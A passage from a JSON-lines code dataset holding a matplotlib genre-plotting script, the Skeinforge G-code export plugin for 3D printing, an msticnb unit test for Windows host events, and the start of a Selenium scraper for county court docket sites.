class\nplt.figure(figsize=(12,10))\nplt.imshow(wordcloud)\nplt.axis(\"off\")\nplt.show()\nplt.savefig('TBrek_Genre_WordCloud.png') \n\n\nx = list(genres.keys())\ny = list(genres.values())\nprint('x = ', x, 'y = ', y) \nfig, axs = plt.subplots(2)\nplt.title(\"RAP VS OTHER GENRES TOP 200 2020\", fontsize=14);\naxs[0].pie(x=y, autopct=\"%.1f%%\", labels=x, pctdistance=0.5)\n\nplt.savefig('tbrek_rap_vs_other_pie.png')\naxs[1].bar(x , y, width = 0.2, color = 'maroon')\nplt.xlabel(\"Genres\") \nplt.ylabel(\"No. of songs\") \nplt.show()\n#plt.title(\"RAP VS OTHER GENRES TOP 200 2020\", fontsize=14);\nplt.savefig('tbrek_rap_vs_other_bar.png')\n\n\n","sub_path":"TBrek.py","file_name":"TBrek.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"470136170","text":"\"\"\"\nThis page is in the table of contents.\nExport is a craft tool to pick an export plugin, add information to the file name, and delete comments.\n\nThe export manual page is at:\nhttp://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Export\n\n==Operation==\nThe default 'Activate Export' checkbox is on. When it is on, the functions described below will work, when it is off, the functions will not be called.\n\n==Settings==\n===Add Descriptive Extension===\nDefault is off.\n\nWhen selected, key profile values will be added as an extension to the gcode file. For example:\ntest.04hx06w_03fill_2cx2r_33EL.gcode\n\nwould mean:\n\n* . (Carve section.)\n* 04h = 'Layer Thickness (mm):' 0.4\n* x\n* 06w = 0.6 width i.e. 0.4 times 'Perimeter Width over Thickness (ratio):' 1.5\n* _ (Fill section.)\n* 03fill = 'Infill Solidity (ratio):' 0.3\n* _ (Multiply section; if there is one column and one row then this section is not shown.)\n* 2c = 'Number of Columns (integer):' 2\n* x\n* 2r = 'Number of Rows (integer):' 2.\n* _ (Speed section.)\n* 33EL = 'Feed Rate (mm/s):' 33.0 and 'Flow Rate Setting (float):' 33.0. If either value has a positive value after the decimal place then this is also shown, but if it is zero it is hidden. Also, if the values differ (which they shouldn't with 5D volumetrics) then each should be displayed separately. For example, 35.2E30L = 'Feed Rate (mm/s):' 35.2 and 'Flow Rate Setting (float):' 30.0.\n\n===Add Profile Extension===\nDefault is off.\n\nWhen selected, the current profile will be added to the file extension. For example:\ntest.my_profile_name.gcode\n\n===Add Timestamp Extension===\nDefault is off.\n\nWhen selected, the current date and time is added as an extension in format YYYYmmdd_HHMMSS (so it is sortable if one has many files). For example:\ntest.my_profile_name.20110613_220113.gcode\n\n===Also Send Output To===\nDefault is empty.\n\nDefines the output name for sending to a file or pipe. A common choice is stdout to print the output in the shell screen. Another common choice is stderr. With the empty default, nothing will be done. If the value is anything else, the output will be written to that file name.\n\n===Analyze Gcode===\nDefault is on.\n\nWhen selected, the penultimate gcode will be sent to the analyze plugins to be analyzed and viewed.\n\n===Comment Choice===\nDefault is 'Delete All Comments'.\n\n====Do Not Delete Comments====\nWhen selected, export will not delete comments. 
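# --- In the TBrek.py record above, each plt.savefig() comes after plt.show(); in
# non-interactive use show() closes the figure, so the saved images come out blank.
# A minimal corrected ordering (figure contents are illustrative):
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.bar(['RAP', 'OTHER'], [120, 80], color='maroon')
ax.set_xlabel('Genres')
ax.set_ylabel('No. of songs')
fig.savefig('tbrek_rap_vs_other_bar.png')  # save first...
plt.show()                                 # ...then display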
Crafting comments slow down the processing in many firmware types, which leads to pauses and therefore a lower quality print.\n \n====Delete Crafting Comments====\nWhen selected, export will delete the time consuming crafting comments, but leave the initialization comments. Since the crafting comments are deleted, there are no pauses during extrusion. The remaining initialization comments provide some useful information for the analyze tools.\n\n====Delete All Comments====\nWhen selected, export will delete all comments. The comments are not necessary to run a fabricator. Some printers do not support comments at all so the safest way is choose this option.\n\n===Export Operations===\nExport presents the user with a choice of the export plugins in the export_plugins folder. The chosen plugin will then modify the gcode or translate it into another format. There is also the \"Do Not Change Output\" choice, which will not change the output. An export plugin is a script in the export_plugins folder which has the getOutput function, the globalIsReplaceable variable and if it's output is not replaceable, the writeOutput function.\n\n===File Extension===\nDefault is gcode.\n\nDefines the file extension added to the name of the output file. The output file will be named as originalname_export.extension so if you are processing XYZ.stl the output will by default be XYZ_export.gcode\n \n===Name of Replace File===\nDefault is replace.csv.\n\nWhen export is exporting the code, if there is a tab separated file with the name of the \"Name of Replace File\" setting, it will replace the string in the first column by its replacement in the second column. If there is nothing in the second column, the first column string will be deleted, if this leads to an empty line, the line will be deleted. If there are replacement columns after the second, they will be added as extra lines of text. There is an example file replace_example.csv to demonstrate the tab separated format, which can be edited in a text editor or a spreadsheet.\n\nExport looks for the alteration file in the alterations folder in the .skeinforge folder in the home directory. Export does not care if the text file names are capitalized, but some file systems do not handle file name cases properly, so to be on the safe side you should give them lower case names. If it doesn't find the file it then looks in the alterations folder in the skeinforge_plugins folder.\n\n===Save Penultimate Gcode===\nDefault is off.\n\nWhen selected, export will save the gcode file with the suffix '_penultimate.gcode' just before it is exported. This is useful because the code after it is exported could be in a form which the viewers can not display well.\n\n==Examples==\nThe following examples export the file Screw Holder Bottom.stl. The examples are run in a terminal in the folder which contains Screw Holder Bottom.stl and export.py.\n\n> python export.py\nThis brings up the export dialog.\n\n> python export.py Screw Holder Bottom.stl\nThe export tool is parsing the file:\nScrew Holder Bottom.stl\n..\nThe export tool has created the file:\n.. 
Screw Holder Bottom_export.gcode\n\n\"\"\"\n\nfrom __future__ import absolute_import\n#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.\nimport __init__\n\nfrom fabmetheus_utilities.fabmetheus_tools import fabmetheus_interpret\nfrom fabmetheus_utilities import archive\nfrom fabmetheus_utilities import euclidean\nfrom fabmetheus_utilities import gcodec\nfrom fabmetheus_utilities import intercircle\nfrom fabmetheus_utilities import settings\nfrom skeinforge_application.skeinforge_utilities import skeinforge_analyze\nfrom skeinforge_application.skeinforge_utilities import skeinforge_craft\nfrom skeinforge_application.skeinforge_utilities import skeinforge_polyfile\nfrom skeinforge_application.skeinforge_utilities import skeinforge_profile\nimport cStringIO\nimport os\nimport sys\nimport time\n\n\n__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'\n__credits__ = 'Gary Hodgson '\n__date__ = '$Date: 2008/21/04 $'\n__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'\n\n\ndef getCraftedTextFromText(gcodeText, repository=None):\n\t'Export a gcode linear move text.'\n\tif gcodec.isProcedureDoneOrFileIsEmpty( gcodeText, 'export'):\n\t\treturn gcodeText\n\tif repository is None:\n\t\trepository = settings.getReadRepository(ExportRepository())\n\tif not repository.activateExport.value:\n\t\treturn gcodeText\n\treturn ExportSkein().getCraftedGcode(repository, gcodeText)\n\ndef getDescriptionCarve(lines):\n\t'Get the description for carve.'\n\tdescriptionCarve = ''\n\tlayerThicknessString = getSettingString(lines, 'carve', 'Layer Thickness')\n\tif layerThicknessString is not None:\n\t\tdescriptionCarve += layerThicknessString.replace('.', '') + 'h'\n\tperimeterWidthString = getSettingString(lines, 'carve', 'Perimeter Width over Thickness')\n\tif perimeterWidthString is not None:\n\t\tdescriptionCarve += 'x%sw' % str(float(perimeterWidthString) * float(layerThicknessString)).replace('.', '')\n\treturn descriptionCarve\n\ndef getDescriptionFill(lines):\n\t'Get the description for fill.'\n\tactivateFillString = getSettingString(lines, 'fill', 'Activate Fill')\n\tif activateFillString is None or activateFillString == 'False':\n\t\treturn ''\n\tinfillSolidityString = getSettingString(lines, 'fill', 'Infill Solidity')\n\treturn '_' + infillSolidityString.replace('.', '') + 'fill'\n\ndef getDescriptionMultiply(lines):\n\t'Get the description for multiply.'\n\tactivateMultiplyString = getSettingString(lines, 'multiply', 'Activate Multiply')\n\tif activateMultiplyString is None or activateMultiplyString == 'False':\n\t\treturn ''\n\tcolumnsString = getSettingString(lines, 'multiply', 'Number of Columns')\n\trowsString = getSettingString(lines, 'multiply', 'Number of Rows')\n\tif columnsString == '1' and rowsString == '1':\n\t\treturn ''\n\treturn '_%scx%sr' % (columnsString, rowsString)\n\ndef getDescriptionSpeed(lines):\n\t'Get the description for speed.'\n\tactivateSpeedString = getSettingString(lines, 'speed', 'Activate Speed')\n\tif activateSpeedString is None or activateSpeedString == 'False':\n\t\treturn ''\n\tfeedRateString = getSettingString(lines, 'speed', 'Feed Rate')\n\tflowRateString = getSettingString(lines, 'speed', 'Flow Rate')\n\tif feedRateString == flowRateString:\n\t\treturn '_%sEL' % feedRateString.replace('.0', '')\n\treturn '_%sE%sL' % (feedRateString.replace('.0', ''), flowRateString.replace('.0', ''))\n\ndef 
getDescriptiveExtension(gcodeText):\n\t'Get the descriptive extension.'\n\tlines = archive.getTextLines(gcodeText)\n\treturn '.' + getDescriptionCarve(lines) + getDescriptionFill(lines) + getDescriptionMultiply(lines) + getDescriptionSpeed(lines)\n\ndef getDistanceGcode(exportText):\n\t'Get gcode lines with distance variable added.'\n\tlines = archive.getTextLines(exportText)\n\toldLocation = None\n\tfor line in lines:\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tfirstWord = None\n\t\tif len(splitLine) > 0:\n\t\t\tfirstWord = splitLine[0]\n\t\tif firstWord == 'G1':\n\t\t\tlocation = gcodec.getLocationFromSplitLine(oldLocation, splitLine)\n\t\t\tif oldLocation is not None:\n\t\t\t\tdistance = location.distance(oldLocation)\n\t\t\t\tprint( distance )\n\t\t\toldLocation = location\n\treturn exportText\n\ndef getFirstValue(gcodeText, word):\n\t'Get the value from the first line which starts with the given word.'\n\tfor line in archive.getTextLines(gcodeText):\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tif gcodec.getFirstWord(splitLine) == word:\n\t\t\treturn splitLine[1]\n\treturn ''\n\ndef getNewRepository():\n\t'Get new repository.'\n\treturn ExportRepository()\n\ndef getReplaceableExportGcode(nameOfReplaceFile, replaceableExportGcode):\n\t'Get text with strings replaced according to replace.csv file.'\n\treplaceLines = settings.getAlterationLines(nameOfReplaceFile)\n\tif len(replaceLines) < 1:\n\t\treturn replaceableExportGcode\n\tfor replaceLine in replaceLines:\n\t\tsplitLine = replaceLine.replace('\\\\n', '\\t').split('\\t')\n\t\tif len(splitLine) > 0:\n\t\t\treplaceableExportGcode = replaceableExportGcode.replace(splitLine[0], '\\n'.join(splitLine[1 :]))\n\toutput = cStringIO.StringIO()\n\tgcodec.addLinesToCString(output, archive.getTextLines(replaceableExportGcode))\n\treturn output.getvalue()\n\ndef getSelectedPluginModule( plugins ):\n\t'Get the selected plugin module.'\n\tfor plugin in plugins:\n\t\tif plugin.value:\n\t\t\treturn archive.getModuleWithDirectoryPath( plugin.directoryPath, plugin.name )\n\treturn None\n\ndef getSettingString(lines, procedureName, settingNameStart):\n\t'Get the setting value from the lines, return None if there is no setting starting with that name.'\n\tsettingNameStart = settingNameStart.replace(' ', '_')\n\tfor line in lines:\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tfirstWord = None\n\t\tif len(splitLine) > 0:\n\t\t\tfirstWord = splitLine[0]\n\t\tif firstWord == '(':\n\t\t\tif len(splitLine) > 4:\n\t\t\t\tif splitLine[1] == procedureName and splitLine[2].startswith(settingNameStart):\n\t\t\t\t\treturn splitLine[3]\n\t\telif firstWord == '()':\n\t\t\treturn None\n\treturn None\n\ndef sendOutputTo(outputTo, text):\n\t'Send output to a file or a standard output.'\n\tif outputTo.endswith('stderr'):\n\t\tsys.stderr.write(text)\n\t\tsys.stderr.write('\\n')\n\t\tsys.stderr.flush()\n\t\treturn\n\tif outputTo.endswith('stdout'):\n\t\tsys.stdout.write(text)\n\t\tsys.stdout.write('\\n')\n\t\tsys.stdout.flush()\n\t\treturn\n\tarchive.writeFileText(outputTo, text)\n\ndef writeOutput(fileName, shouldAnalyze=True):\n\t'Export a gcode linear move file.'\n\tif fileName == '':\n\t\treturn None\n\trepository = ExportRepository()\n\tsettings.getReadRepository(repository)\n\tstartTime = time.time()\n\tprint('File ' + archive.getSummarizedFileName(fileName) + ' is being chain exported.')\n\tfileNameSuffix = fileName[: fileName.rfind('.')]\n\tif 
repository.addExportSuffix.value:\n\t\tfileNameSuffix += '_export'\n\tgcodeText = gcodec.getGcodeFileText(fileName, '')\n\tprocedures = skeinforge_craft.getProcedures('export', gcodeText)\n\tgcodeText = skeinforge_craft.getChainTextFromProcedures(fileName, procedures[: -1], gcodeText)\n\tif gcodeText == '':\n\t\treturn None\n\tif repository.addProfileExtension.value:\n\t\tfileNameSuffix += '.' + getFirstValue(gcodeText, '(<profileName>')\n\tif repository.addDescriptiveExtension.value:\n\t\tfileNameSuffix += getDescriptiveExtension(gcodeText)\n\tif repository.addTimestampExtension.value:\n\t\tfileNameSuffix += '.' + getFirstValue(gcodeText, '(<timeStampPreface>')\n\tfileNameSuffix += '.' + repository.fileExtension.value\n\tfileNamePenultimate = fileName[: fileName.rfind('.')] + '_penultimate.gcode'\n\tfilePenultimateWritten = False\n\tif repository.savePenultimateGcode.value:\n\t\tarchive.writeFileText(fileNamePenultimate, gcodeText)\n\t\tfilePenultimateWritten = True\n\t\tprint('The penultimate file is saved as ' + archive.getSummarizedFileName(fileNamePenultimate))\n\texportGcode = getCraftedTextFromText(gcodeText, repository)\n\twindow = None\n\tif shouldAnalyze and repository.analyzeGcode.value:\n\t\twindow = skeinforge_analyze.writeOutput(fileName, fileNamePenultimate, fileNameSuffix, filePenultimateWritten, gcodeText)\n\treplaceableExportGcode = None\n\tselectedPluginModule = getSelectedPluginModule(repository.exportPlugins)\n\tif selectedPluginModule is None:\n\t\treplaceableExportGcode = exportGcode\n\telse:\n\t\tif selectedPluginModule.globalIsReplaceable:\n\t\t\treplaceableExportGcode = selectedPluginModule.getOutput(exportGcode)\n\t\telse:\n\t\t\tselectedPluginModule.writeOutput(fileNameSuffix, exportGcode)\n\tif replaceableExportGcode is not None:\n\t\treplaceableExportGcode = getReplaceableExportGcode(repository.nameOfReplaceFile.value, replaceableExportGcode)\n\t\tarchive.writeFileText( fileNameSuffix, replaceableExportGcode )\n\t\tprint('The exported file is saved as ' + archive.getSummarizedFileName(fileNameSuffix))\n\tif repository.alsoSendOutputTo.value != '':\n\t\tif replaceableExportGcode is None:\n\t\t\treplaceableExportGcode = selectedPluginModule.getOutput(exportGcode)\n\t\tsendOutputTo(repository.alsoSendOutputTo.value, replaceableExportGcode)\n\tprint('It took %s to export the file.' 
% euclidean.getDurationString(time.time() - startTime))\n\treturn window\n\n\nclass ExportRepository:\n\t'A class to handle the export settings.'\n\tdef __init__(self):\n\t\t'Set the default settings, execute title & settings fileName.'\n\t\tskeinforge_profile.addListsToCraftTypeRepository('skeinforge_application.skeinforge_plugins.craft_plugins.export.html', self)\n\t\tself.fileNameInput = settings.FileNameInput().getFromFileName( fabmetheus_interpret.getGNUTranslatorGcodeFileTypeTuples(), 'Open File for Export', self, '')\n\t\tself.openWikiManualHelpPage = settings.HelpPage().getOpenFromAbsolute('http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Export')\n\t\tself.activateExport = settings.BooleanSetting().getFromValue('Activate Export', self, True)\n\t\tself.addExportSuffix = settings.BooleanSetting().getFromValue('Add _export to filename (filename_export)', self, True)\n\t\tself.alsoSendOutputTo = settings.StringSetting().getFromValue('Also Send Output To:', self, '')\n\t\tself.analyzeGcode = settings.BooleanSetting().getFromValue('Analyze Gcode', self, True)\n\t\tself.commentChoice = settings.MenuButtonDisplay().getFromName('Handling of Comments in G-Code:', self)\n\t\tself.doNotDeleteComments = settings.MenuRadio().getFromMenuButtonDisplay(self.commentChoice, 'Do Not Delete Comments', self, False)\n\t\tself.deleteCraftingComments = settings.MenuRadio().getFromMenuButtonDisplay(self.commentChoice, 'Delete Crafting Comments', self, False)\n\t\tself.deleteAllComments = settings.MenuRadio().getFromMenuButtonDisplay(self.commentChoice, 'Delete All Comments', self, True)\n\t\texportPluginsFolderPath = archive.getAbsoluteFrozenFolderPath(archive.getCraftPluginsDirectoryPath('export.py'), 'export_plugins')\n\t\texportStaticDirectoryPath = os.path.join(exportPluginsFolderPath, 'static_plugins')\n\t\texportPluginFileNames = archive.getPluginFileNamesFromDirectoryPath(exportPluginsFolderPath)\n\t\texportStaticPluginFileNames = archive.getPluginFileNamesFromDirectoryPath(exportStaticDirectoryPath)\n\t\tsettings.LabelDisplay().getFromName(' ', self)\n\t\tself.exportLabel = settings.LabelDisplay().getFromName('--Export Operations-- ', self)\n\t\tself.exportPlugins = []\n\t\texportLatentStringVar = settings.LatentStringVar()\n\t\tself.doNotChangeOutput = settings.RadioCapitalized().getFromRadio(exportLatentStringVar, 'Do Not Change Output', self, True)\n\t\tself.doNotChangeOutput.directoryPath = None\n\t\tallExportPluginFileNames = exportPluginFileNames + exportStaticPluginFileNames\n\t\tfor exportPluginFileName in allExportPluginFileNames:\n\t\t\texportPlugin = None\n\t\t\tif exportPluginFileName in exportPluginFileNames:\n\t\t\t\tpath = os.path.join(exportPluginsFolderPath, exportPluginFileName)\n\t\t\t\texportPlugin = settings.RadioCapitalizedButton().getFromPath(exportLatentStringVar, exportPluginFileName, path, self, False)\n\t\t\t\texportPlugin.directoryPath = exportPluginsFolderPath\n\t\t\telse:\n\t\t\t\texportPlugin = settings.RadioCapitalized().getFromRadio(exportLatentStringVar, exportPluginFileName, self, False)\n\t\t\t\texportPlugin.directoryPath = exportStaticDirectoryPath\n\t\t\tself.exportPlugins.append(exportPlugin)\n\t\tself.fileExtension = settings.StringSetting().getFromValue('File Extension (gcode):', self, 'gcode')\n\t\tself.nameOfReplaceFile = settings.StringSetting().getFromValue('Name of Replace File:', self, 'replace.csv')\n\t\tself.savePenultimateGcode = settings.BooleanSetting().getFromValue('Save Penultimate Gcode', self, 
True)\n\t\tsettings.LabelDisplay().getFromName(' ', self)\n\t\tsettings.LabelDisplay().getFromName('--File Name Alterations--', self)\n\t\tsettings.LabelDisplay().getFromName('\"WARNING\" IF ANY OF BELOW CHECKBOXES ARE CHECKED', self)\n\t\tsettings.LabelDisplay().getFromName('SFACT WILL NOT WORK FROM WITHIN PRONTERFACE!!', self)\n\t\tself.addProfileExtension = settings.BooleanSetting().getFromValue('Add Profile Extension', self, False)\n\t\tself.addDescriptiveExtension = settings.BooleanSetting().getFromValue('Add Descriptive Extension', self, False)\n\t\tself.addTimestampExtension = settings.BooleanSetting().getFromValue('Add Timestamp Extension', self, False)\n\t\tself.executeTitle = 'Export'\n\n\tdef execute(self):\n\t\t'Export button has been clicked.'\n\t\tfileNames = skeinforge_polyfile.getFileOrDirectoryTypesUnmodifiedGcode(self.fileNameInput.value, fabmetheus_interpret.getImportPluginFileNames(), self.fileNameInput.wasCancelled)\n\t\tfor fileName in fileNames:\n\t\t\twriteOutput(fileName)\n\n\nclass ExportSkein:\n\t'A class to export a skein of extrusions.'\n\tdef __init__(self):\n\t\tself.crafting = False\n\t\tself.decimalPlacesExported = 2\n\t\tself.output = cStringIO.StringIO()\n\n\tdef addLine(self, line):\n\t\t'Add a line of text and a newline to the output.'\n\t\tif line != '':\n\t\t\tself.output.write(line + '\\n')\n\n\tdef getCraftedGcode( self, repository, gcodeText ):\n\t\t'Parse gcode text and store the export gcode.'\n\t\tself.repository = repository\n\t\tlines = archive.getTextLines(gcodeText)\n\t\tfor line in lines:\n\t\t\tself.parseLine(line)\n\t\treturn self.output.getvalue()\n\n\tdef getLineWithTruncatedNumber(self, character, line, splitLine):\n\t\t'Get a line with the number after the character truncated.'\n\t\tnumberString = gcodec.getStringFromCharacterSplitLine(character, splitLine)\n\t\tif numberString is None:\n\t\t\treturn line\n\t\troundedNumberString = euclidean.getRoundedToPlacesString(self.decimalPlacesExported, float(numberString))\n\t\treturn gcodec.getLineWithValueString(character, line, splitLine, roundedNumberString)\n\n\tdef parseLine(self, line):\n\t\t'Parse a gcode line.'\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tif len(splitLine) < 1:\n\t\t\treturn\n\t\tfirstWord = splitLine[0]\n\t\tif firstWord == '(</crafting>)':\n\t\t\tself.crafting = False\n\t\telif firstWord == '(<decimalPlacesCarried>':\n\t\t\tself.decimalPlacesExported = int(splitLine[1]) - 1\n\t\tif self.repository.deleteAllComments.value or (self.repository.deleteCraftingComments.value and self.crafting):\n\t\t\tif firstWord[0] == '(':\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tline = line.split(';')[0].split('(')[0].strip()\n\t\tif firstWord == '(<crafting>)':\n\t\t\tself.crafting = True\n\t\tif firstWord == '(</extruderInitialization>)':\n\t\t\tself.addLine(gcodec.getTagBracketedProcedure('export'))\n\t\tif firstWord != 'G1' and firstWord != 'G2' and firstWord != 'G3' :\n\t\t\tself.addLine(line)\n\t\t\treturn\n\t\tline = self.getLineWithTruncatedNumber('X', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('Y', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('Z', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('I', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('J', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('R', line, splitLine)\n\t\tself.addLine(line)\n\n\ndef main():\n\t'Display the export dialog.'\n\tif len(sys.argv) > 1:\n\t\twriteOutput(' '.join(sys.argv[1 :]))\n\telse:\n\t\tsettings.startMainLoopFromConstructor(getNewRepository())\n\nif __name__ == 
'__main__':\n\tmain()\n","sub_path":"skeinforge_application/skeinforge_plugins/craft_plugins/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":21278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"602710057","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\"\"\"Test the nb_template class.\"\"\"\nfrom pathlib import Path\n\n# from contextlib import redirect_stdout\nimport unittest\n\nimport pandas as pd\n\nfrom msticnb.common import TimeSpan\nfrom msticnb import nblts\nfrom msticnb.data_providers import init\n\nfrom ....unit_test_lib import TEST_DATA_PATH\n\n\n# pylint: disable=no-member\n\n\nclass TestWinHostEvents(unittest.TestCase):\n \"\"\"Tests for nb_template.\"\"\"\n\n def test_winhostevents_notebooklet(self):\n \"\"\"Test basic run of notebooklet.\"\"\"\n test_data = str(Path(TEST_DATA_PATH).absolute())\n init(\n query_provider=\"LocalData\",\n LocalData_data_paths=[test_data],\n LocalData_query_paths=[test_data],\n )\n\n test_nb = nblts.azsent.host.WinHostEvents()\n tspan = TimeSpan(period=\"1D\")\n\n result = test_nb.run(value=\"myhost\", timespan=tspan)\n self.assertIsNotNone(result.all_events)\n self.assertIsInstance(result.all_events, pd.DataFrame)\n self.assertIsNotNone(result.event_pivot)\n self.assertIsInstance(result.event_pivot, pd.DataFrame)\n self.assertIsNotNone(result.account_events)\n self.assertIsInstance(result.account_events, pd.DataFrame)\n self.assertIsNotNone(result.event_pivot)\n self.assertIsInstance(result.event_pivot, pd.DataFrame)\n # self.assertIsNotNone(result.account_timeline)\n\n exp_events = test_nb.expand_events([\"5058\", \"5061\"])\n self.assertIsInstance(exp_events, pd.DataFrame)\n","sub_path":"tests/nb/azsent/host/test_win_host_events.py","file_name":"test_win_host_events.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"445123067","text":"from selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import MoveTargetOutOfBoundsException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\n\nimport time\nimport os\nimport json\n\nfrom county_fns import create_driver as create_driver\nfrom county_fns import scroll\nfrom county_processor import CountyProcessor\nfrom county_processor import DocumentException\nfrom dynamo_interface import *\nfrom file_processor import DownloadException\nfrom file_processor import FileProcessor\nfrom slogger import sLogger\n\n\"\"\"\n\tGLOBAL VARIABLES\n\"\"\"\nDOCUMENT_NAME = 'docketimage'\nDOCUMENT_FILE_EXTENSION = 'pdf'\n\n# Public Page - Xpath for Public Button\nPUBLIC_PAGE_PUBLIC_BUTTON_XPATH = '//form/div/table/tbody/tr[1]/td[1]/button'\n# 
Disclaimer Page - Element ID for Agree Button\nDISCLAIMER_PAGE_AGREE_BUTTON_ID = 'j_idt42:j_idt44'\n# Search Form Page - Xpath to Captcha\nSEARCH_PAGE_CAPTCHA_XPATH = '//*[@title=\"recaptcha challenge\"]'\n# Search Form Page - Element ID to business name input\nSEARCH_PAGE_BUSINESS_INPUT_ID = 'form:search_tab:businessname'\n# Search Form Page - Element ID to From Date input\nSEARCH_PAGE_FROM_DATE_INPUT_ID = 'form:search_tab:fromDate_input'\n# Search Form Page - Element ID to To Date input\nSEARCH_PAGE_TO_DATE_INPUT_ID = 'form:search_tab:toDate_input'\n# Search Form Page - Element ID to Display Cases Radio Button\n#SEARCH_PAGE_DISPLAY_CASES_BUTTON_ID = 'form:search_tab:console:1'\nsearCH_PAGE_DISPLAY_CASES_X_PATH = '/html/body/div[1]/div[1]/form[2]/div[1]/div/div[1]/div[3]/table/tbody/tr/td[2]/div/div[2]/span'\n# Search Form Page - Xpath to Search button\nSEARCH_PAGE_SEARCH_BUTTON_XPATH = '//form[@id=\"form\"]/div[3]/button[span=\"Search\"]'\n# Results Page - Xpath to Data Table Head\nRESULTS_PAGE_DATE_COL_HEAD_XPATH = '//thead[@id=\"partyResultsDisplayByCases:partySRDisplayByCasesTable_head\"]/tr[1]/th[3]'\n# Results Page - Xpath to rows of table of cases\nRESULTS_PAGE_TABLE_ROWS_XPATH = '/html/body/div[1]/div[1]/form[2]/div[2]/div/table/tbody/tr'\n# Results Page - Xpath to each case link in table of cases\nRESULTS_PAGE_TABLE_ROW_CASE_LINK_XPATH = '/html/body/div[1]/div[1]/form[2]/div[2]/div/table/tbody/tr[{}]/td[3]/a'\n# Case Page - ID select dropdown for number of dockets visible\nCASE_PAGE_NUM_DOCKETS_SELECT_ID = 'form:docketDataTable1:j_id2'\n# Case Page - Table header ID for extended list view\nCASE_PAGE_THEAD_PAGINATOR = 'form:docketDataTable1_paginator_top'\n# Case Page - Xpath to Docket paginator next button in disabled state\nCASE_PAGE_THEAD_PAGINATOR_NEXT_DISABLED_XPATH = '//div[@id=\"form:docketDataTable1_paginator_top\"]/a[contains(@class, \"ui-state-disabled\")][3]'\n# Case Page - Xpath to rows of table of dockets\nCASE_PAGE_DOCKET_TABLE_ROWS_XPATH = '//tbody[@id=\"form:docketDataTable1_data\"]/tr'\n# Case Page - Xpath to docket row\nCASE_PAGE_DOCKET_TABLE_ROW_XPATH = '//tbody[@id=\"form:docketDataTable1_data\"]/tr[{}]'\n# Case Page - Xpath modifier to docket image\nCASE_PAGE_DOCKET_IMAGE_XPATH_MODIFIER = './/td[1]/a[@title=\"docketImage\"]'\n# Case Page - Xpath modifier to docket request\nCASE_PAGE_DOCKET_REQ_XPATH_MODIFIER = './/td[1]/button[@title=\"Request Image\"]'\n# Case Page - Xpath modifier to restricted document\nCASE_PAGE_DOCKET_RESTRICTED_XPATH_MODIFIER = './/td[1]/button[@title=\"Request Image\"]'\n# Case Page - Xpath modifier to docket number\nCASE_PAGE_DOCKET_NUM_XPATH_MODIFIER = './/td[2]'\n# Case Page - Xpath modifier to docket description\nCASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER = './/td[4]'\n# Case Page - Xpath modifier to docket availability if docket available\nCASE_PAGE_DOCKET_AVAIL_XPATH_MODIFIER_V1 = '//*[@alt=\"viewDocket\"]'\n# Case Page - Xpath modifier to docket availability if docket can be requested\nCASE_PAGE_DOCKET_AVAIL_XPATH_MODIFIER_V2 = '//*[@title=\"Request Image\"]'\n\n\"\"\"\n\tData Gather for Counties using Civitek\n\"\"\"\nclass CivitekProcessor(CountyProcessor):\n\n\t\"\"\"\n\t\tConstructor\n\t\"\"\"\n\tdef __init__(self, county_name, website, download_folder, document_description):\n\t\tsuper().__init__(county_name, website, download_folder, document_description)\n\n\t\tself._default_doc_name = DOCUMENT_NAME\n\t\tself.county_name = county_name\n\n\n\t\"\"\"\n\t\tExecute scraper\n\t\"\"\"\n\tdef execute(self, search_term, from_date, 
